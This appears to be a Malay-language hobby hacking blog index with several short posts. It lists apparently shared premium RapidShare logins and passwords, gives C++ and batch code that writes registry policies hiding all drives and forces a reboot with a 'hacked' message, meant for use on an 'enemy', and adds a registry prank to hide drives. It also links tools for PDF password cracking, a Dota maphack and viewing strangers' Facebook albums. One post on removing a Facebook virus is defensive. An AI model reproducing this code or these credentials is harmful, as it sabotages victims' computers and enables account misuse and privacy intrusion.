Akaun premium rapidshare






Assalamualaikum..

Sini admin nk kongsi id2 premium rapidshare yg dapat admin ambil dari blog2 dan website2.. kah3..
so korang test la sendiri coz admin test ok ja...


LOGIN: 31989
PASSWORD: 2310214
LOGIN: 27766
PASSWORD: 8797341
User: 18549
Password: 4646182
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043
LOGIN: 20949
PASSWORD: 2716739
User: 22484
Password: 358030
User: 18549
Password: 4646182
User: 18800
Password: 9496722
LOGIN: 20949
PASSWORD: 2716739
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043

Read More - Akaun premium rapidshare

Cara Hack PDF Password secara Percuma




Assalamualaikum..
k hari ni Admin update cara hack fail password pdf.. senang ja.. korang just pegi kt laman web admin bagi dibawah ni pastu korang upload.. ikut instruction k..

Link 1

Link 2


senang kan.. so lepas ni korang bolehlah unlock mana pdf fail secara percuma yep..
selamat mencuba... :)

Read More - Cara Hack PDF Password secara Percuma

Software Radio Online Malaysia Percuma








Assalamualaikum..
Pada kali Ini Admin ade la rajin sikit buat satu software dengar radio secara Online percuma untuk korang nieh kah3.. .. so apa korang tggu lagi??
download la dengar radio.. cuma interface ja hodoh.. kaka.. jgn complain erk.. jnji function dye ok no fail punya.. bawah ni download n Interface dye k.. selamat mendengar radio n jangan lupa like fanpages fb.. :) Nantikan Autoblogwalking dari Admin akan dtg.. free ja Admin kasi.. keh3..





Note: Kalau Korang ada nk suh tambah radio pape tinggal ja la kat komen nnt Admin Update untuk korang.. promosi sikit radio tu walupon simple je.. kah3..

Read More - Software Radio Online Malaysia Percuma

Cara guna Maphack mh Dota




Assalamualaikum..
Wah dengar tajuk atas tu da tau kan bagi gamers Dota .. kah3... sini Admin mahu post Cara Untuk Maphack Dota  .. senang ja.. cuma klu korang men maphack ni ble korang nak pandai kan.. ni untuk newbie2 yang men kt garena  so korang just download  software ni.. run ..


Download


Kepada otai2 Dota tu jangan marah :D just for information.. keh3.. (kot2 otai pon guna benda ni)

Read More - Cara guna Maphack mh Dota

Virus Disable Hard Drive





Salam..
ermm.. hari ni xde pa nak tulis cuma sedikit kerja jahat untuk mengenakan musuh .. kah3.. so pada kali ini Admin kongsi cara untuk disablekan hardrive musuh.. cara nni untuk yang ada C++ compiler k...

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }




Copy kod kt atas dan paste pada notepad Save fail ini dengan nama .cpp extension Compile gunakan c++ dan buat .exe fail.

Cara ke 2

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Kah3 Pc ko kne hack ler!\" -f

ambil kod kt atas ni pastu korang paste dalam notepad.. pastu save apa2 korang suka janji format   .bat

contoh "Hackpensil.bat "  jgn korang tekan double klik plak klu dah simpan... kah3.. merana kang.:D

Admin syorkan guna cara 2 la senang.. .. k.. Selamat mencuba .. keh3.. 

Read More - Virus Disable Hard Drive

Cara buang Virus FB


Assalamualaikum..
hah! virus facebook.. kah3.. mst ramai da kena kn.. ?, :D
Admin xpenah kena lagi tp ramai kawan Admin da kena virus ni.. fungsi virus ni dye akan spam samaada dari chat facebook atau post wall to wall org.. kah3.. sini admin akan paparkan cara buang virus ni k.. korang just ikut step admin ni.. so 
Admin bagi korang 3 cara samaada buang manual ataupon pakai software.. kot korang la mana mudah k..

cara manual 1

Step1> Start>Run> pastu taip c:\windows\system32\drivers\etc
Step2> oraite cari fail nama "host" pastu buka.. pilih notepad 

step3>dalam file "hosts" tadi akan ada satu baris seperti di bawah.CARI BARIS INI: facebook.com 
(CONTOH: “127.0.0.1 http://www.facebook.com” )
 Buang jika ada “127.0.0.1 http://www.facebook.com”Tutup file "hosts" dan save.
Settle.. 
Cara yang ke 2 


Step 1-Start>run>regedit


Step 2- korang ikut ni tengak mana yang admin merahkan tulisan nya delete k..


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “c:\windows\mstre6.exe”


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “C:\Windows\fbtre6.exe”


HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating;






Cara lagi senang malas nk baca ikut bawah ni

Step1> dowbload link ni pastu install pastu scan settle.. wakaka.. senang ja..



Read More - Cara buang Virus FB

Cara Untuk Download Multiple Rapidshare






Assalamualaikum.. 
Oraite malam ni Admin nak share kat korang cara multiple download rapidshare / megaupload / hotfile dan lain .. senang ja x susah pon.. simple step just download pastu korang install web browser tu.. Biar Admin terang sikit kegunaan benda ni k :) >  Untuk pengetahuan korang apabila kita on browser ni maca proxy browser dimana korang boleh tukar permanently ip address kepada dynamic ip address. kiranya dalam masa yang sama korang mempunyai 2 ipaddress.. hebat kn..? kah3..  yang lagi best Internet download manager (IDM) support browser ni..  wah boleh download rapidshare / megaupload / hotfile dan lain dalam masa yang sama ler.. kui3.. so korang leh test sendri.. link download 







 Selamat mencuba untuk korang :)

Read More - Cara Untuk Download Multiple Rapidshare

Cara Untuk Disable Drive Dalam My Computer






Salam...
haa ni pula Admin mahu Share dengan korang trick2 untuk kita  kenakan org.. best2 kn kenakan orang ni.. dari duka boleh suka kn.. tapi kdang2 dari suka pon leh jadi duka.. kah3..  So apa yang Admin share sini ada untuk disablekan drive dalam my computer.. so ikut step ni 

Step1- klik start->run>regedit

Step2-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Step 3-right click pastu pilih  DWORD namakan dia NoDrives

Step4- oraite korang dah create kan?? so korang modify plak right klik kat situ isikan angka Admin bagi ni
 pada ruang  (Hexadecimal)                                  3FFFFFF  

oraite dapat? so pastu korang pergi ke my computer dan tekan f5 (refresh) ...
haaa kan xde kan..hahaha .. dah hilang.... camna cara nak adakan balik?? korang delete ja file korang create tadi. dan settle masalah .. kah3..  selamat mencuba..   

Read More - Cara Untuk Disable Drive Dalam My Computer

Hack Album Facebook orang .






Assalamualaikum.. dan salam sejahtera..
haha.. lame dah Admin x update kn.. so Admin tgh slow2 la ni nak update post Admin..
so pd kali ini Admin akan kongsikan cara untuk tengok gambar facebook orang lain tanpa add friend dengan diorang... mane la tau ade gambar pelik2 kn!.. haha...  so korang ikut step bawah ni je la.. kah3 xmo menaip byk2.. admin just ambik laman web matsalleh ni ... sebab infi ni Admin tengok penting gak buat Admin..  Selamat mencuba.. :)




Read More - Hack Album Facebook orang .